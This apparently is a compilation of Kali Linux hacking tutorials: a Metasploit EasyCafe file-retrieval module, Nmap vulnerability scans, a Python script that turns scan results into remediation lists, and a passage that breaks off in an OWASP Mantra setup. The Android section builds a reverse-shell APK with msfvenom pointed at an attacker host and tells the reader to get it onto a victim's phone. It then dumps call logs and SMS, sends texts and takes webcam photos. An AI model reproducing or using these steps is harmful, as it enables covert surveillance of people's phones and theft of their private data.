Finding Vulnerability in EasyCafe Server using Metasploit

This module exploits a file retrieval vulnerability in EasyCafe Server. The vulnerability is triggered by sending a specially crafted packet (opcode 0x43) to port 831/TCP. The module has been successfully tested on EasyCafe Server version 2.2.14 (Trial mode and Demo mode) on Windows XP SP3 and Windows 7 SP1. Note that the server will throw a popup message box if the specified file does not exist.

Exploit Targets
EasyCafe Server version 2.2.14

Requirement
Attacker: Kali Linux
Victim PC: Windows 7


Open a Kali terminal and type msfconsole


Now type use auxiliary/scanner/misc/easycafe_server_fileaccess
msf exploit (easycafe_server_fileaccess)>set rhosts 192.168.0.103
msf exploit (easycafe_server_fileaccess)>set rport 831
msf exploit (easycafe_server_fileaccess)>exploit



The result will be saved in the /root/.msf4/ directory

Finding Vulnerability in Server/Client using Nmap

Heartbleed bug
The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows an attacker to steal information that the SSL/TLS encryption used to secure the Internet is supposed to protect.

Open terminal in kali

nmap --script=ssl-heartbleed 192.168.0.114


Check the output from Nmap to see whether the server is vulnerable or not

Poodle Bug
The POODLE attack is a man-in-the-middle exploit which takes advantage of Internet and security software clients' fallback to SSL 3.0. (Wikipedia)

Open terminal in kali
nmap --script ssl-poodle 192.168.0.114


IRC Backdoor
Checks if an IRC server is backdoored by running a time-based command (ping) and checking how long it takes to respond. This script can be used to run an arbitrary command on the remote system. 

Open terminal in kali
nmap -sV --script=irc-unrealircd-backdoor -p 6667 192.168.1.6


MS08-067 Vulnerability
Detects Microsoft Windows systems vulnerable to the remote code execution vulnerability known as MS08-067. This check is dangerous and it may crash systems.

Open terminal in kali
nmap --script smb-vuln-ms08-067 -p 445 192.168.0.114


RDP Vulnerability
Checks if a machine is vulnerable to MS12-020. This RDP vulnerability is a denial of service vulnerability inside Terminal Server.
  
nmap -sV --script=rdp-ms12-020 -p 3389 192.168.0.114


Vsftpd Backdoor
Tests for the presence of the vsFTPd 2.3.4 backdoor reported as CVE-2011-2523. This script attempts to exploit the backdoor using the innocuous id command by default, but that can be changed with the exploit.cmd or ftp-vsftpd-backdoor.cmd script arguments.

nmap --script ftp-vsftpd-backdoor -p 21 192.168.1.6
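Each of the scans above prints its verdict on the terminal, but when you run them against more than a handful of hosts you want the results machine-readable so the vulnerable systems can be handed over for patching. The following is an added example, not part of the original page or of the Nmap project: it parses Nmap's XML output (what you get with -oX), pulls out every NSE script result whose state is VULNERABLE or LIKELY VULNERABLE, and builds a remediation list per host. The sample XML, the host addresses and the table keys "Heartbleed" and "POODLE" inside it are constructed for this example; the script ids are the ones used in this section.

```python
import xml.etree.ElementTree as ET

# Constructed sample of Nmap XML output (-oX) for two hosts. Script ids match
# the NSE scripts used above; addresses, output text and table keys are made up.
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap">
  <host>
    <address addr="192.168.0.114" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="443">
        <state state="open"/>
        <script id="ssl-heartbleed" output="VULNERABLE: The Heartbleed Bug">
          <table key="Heartbleed"><elem key="state">VULNERABLE</elem></table>
        </script>
        <script id="ssl-poodle" output="VULNERABLE: SSL POODLE information leak">
          <table key="POODLE"><elem key="state">VULNERABLE</elem></table>
        </script>
      </port>
      <port protocol="tcp" portid="445">
        <state state="open"/>
        <script id="smb-vuln-ms08-067" output="NOT VULNERABLE"/>
      </port>
    </ports>
  </host>
  <host>
    <address addr="192.168.1.6" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21">
        <state state="open"/>
        <script id="ftp-vsftpd-backdoor" output="VULNERABLE: vsFTPd 2.3.4 backdoor">
          <table key="CVE-2011-2523"><elem key="state">VULNERABLE</elem></table>
        </script>
      </port>
    </ports>
  </host>
</nmaprun>
"""

# Short fix for each script id; the advice follows the descriptions given above.
REMEDIATION = {
    "ssl-heartbleed": "upgrade OpenSSL and reissue keys/certificates",
    "ssl-poodle": "disable SSL 3.0 and TLS downgrade fallback",
    "irc-unrealircd-backdoor": "reinstall UnrealIRCd from a clean, verified release",
    "smb-vuln-ms08-067": "apply the MS08-067 security update",
    "rdp-ms12-020": "apply the MS12-020 security update",
    "ftp-vsftpd-backdoor": "replace the backdoored vsFTPd 2.3.4 build",
}


def script_state(script):
    """Return the state of one <script> element.

    Scripts built on Nmap's vulns library emit <elem key="state">; older scripts
    only set the output attribute, so fall back to its first line.
    """
    for elem in script.iter("elem"):
        if elem.get("key") == "state" and elem.text:
            return elem.text.strip()
    output = (script.get("output") or "").strip()
    return output.splitlines()[0] if output else "UNKNOWN"


def is_vulnerable(state):
    """True for VULNERABLE / LIKELY VULNERABLE; False for NOT VULNERABLE, UNKNOWN."""
    state = state.upper()
    return state.startswith("VULNERABLE") or state.startswith("LIKELY VULNERABLE")


def vulnerable_findings(xml_text):
    """Parse Nmap XML and return one dict per vulnerable script result."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("host"):
        addr_elem = host.find("address[@addrtype='ipv4']")
        addr = addr_elem.get("addr") if addr_elem is not None else "unknown"
        for port in host.iter("port"):
            for script in port.findall("script"):
                state = script_state(script)
                if is_vulnerable(state):
                    findings.append({
                        "host": addr,
                        "port": int(port.get("portid")),
                        "script": script.get("id"),
                        "state": state,
                    })
    return findings


def remediation_report(findings):
    """Group findings by host and attach the fix for each script id."""
    lines = []
    for host in sorted({f["host"] for f in findings}):
        lines.append(f"{host}:")
        for f in (x for x in findings if x["host"] == host):
            fix = REMEDIATION.get(f["script"], "review script output and patch")
            lines.append(f"  tcp/{f['port']} {f['script']} [{f['state']}] -> {fix}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(remediation_report(vulnerable_findings(SAMPLE_NMAP_XML)))
```

Run the scans with -oX scan.xml and feed the file's contents to vulnerable_findings; the NOT VULNERABLE result for smb-vuln-ms08-067 in the sample is dropped, while the three VULNERABLE results are listed with their fixes.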



Hack Wallpaper of Remote Android Phone using Metasploit

This module will set the desktop wallpaper background on the specified session. The method of setting the wallpaper depends on the platform type.

First, gain a Meterpreter session on the victim's Android phone using Metasploit (see the tutorial "How to Hack Remote PC").

msf > use post/multi/manage/set_wallpaper
msf post (set_wallpaper)>set WALLPAPER_FILE  /root/Desktop/hack.jpg
msf post (set_wallpaper)>set session 1
msf post (set_wallpaper)>exploit



Hack Call Logs, SMS, Camera of Remote Android Phone using Metasploit


In this article, we will learn how to hack an Android device and exploit it according to one's desires. Android is an operating system based on the Linux kernel. It uses the APK file format to install applications, so our malware will also be in APK format. To construct the malware, use the following msfvenom command:
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 > shell.apk



Once the msfvenom malware has been created, start the handler so that a session can be received. For this, type:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.109
set lport 1234
exploit
Once the handler is running, send the APK file to the victim and make sure it is run on their Android phone. When the file runs, you will get a session as shown in the image below:


Now there are various commands to further exploit the victim's device. We will demonstrate some of the major commands; all of them are shown in the image below:



You can check whether the device is rooted or not by using the following command:
check_root


You can also dump all the call logs by using the following command:
dump_calllog



The above command generates a TXT file with a detailed list of all call logs. Use the following command to read its contents:
cat



You can also send any kind of SMS from the device, remotely, with the following command:
send_sms -d 9599387847 -t hacked



You can even use the following command to capture a picture:
webcam_snap
It saves the picture as a JPEG file.



Similar to dumping the call logs, you can also dump all the SMS messages with the following command:
dump_sms


You can then read the SMS dump file using the cat command as shown in the image below:



This way, you can exploit the Android device as you like.

Setup Browser Based Framework for Web Penetration Testing in Kali Linux (Mantra Toolkit)

OWASP Mantra, a free and open source browser-based security framework, is a collection of free and open source tools integrated into a web browser, which can be handy for penetration testers, web application developers, security professionals and others.

OWASP Mantra provides:
· A web application security testing framework built on top of a browser.
· Supports Windows, Linux (both 32- and 64-bit) and Macintosh.
· Can work with other software like ZAP using the built-in proxy management function, which makes it much more convenient.
· Available in 9 languages: Arabic, Chinese (Simplified), Chinese (Traditional), English, French, Portuguese, Russian, Spanish and Turkish.
· Comes installed with major security distributions including BackTrack and Matriux.

Open your Kali Linux terminal and type


apt-get install owasp-mantra-ff


After the installation completes, open your terminal again and type

owasp-mantra-ff


Now we can access all the tools that OWASP Mantra